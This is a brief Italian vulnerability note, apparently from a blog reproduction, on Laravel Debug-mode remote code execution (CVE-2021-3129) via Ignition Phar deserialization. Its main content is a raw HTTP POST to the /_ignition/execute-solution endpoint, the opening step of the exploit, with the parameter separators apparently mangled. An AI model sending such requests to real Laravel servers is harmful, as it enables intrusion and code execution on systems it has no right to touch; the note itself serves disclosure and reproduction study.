
Laravel RCE CVE-2021-3129
Laravel RCE CVE-2021-3129
Quando Laravel ha la modalità Debug attivata, a causa dell'uso non sicuro delle funzioni file_get_contents() e file_put_contents() da parte del componente Ignition incluso in Laravel, un attaccante può innescare la deserializzazione di Phar inviando richieste dannose, creando file di log malintenzionati, ecc., portando infine all'esecuzione remota di codice.
Laravel <= 8.4.2
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution¶meters[variableName]=cve20213129¶meters[viewFile]=null

[CVE-2021-3129]Laravel Debug mode RCE riproduzione | Blog di tyskill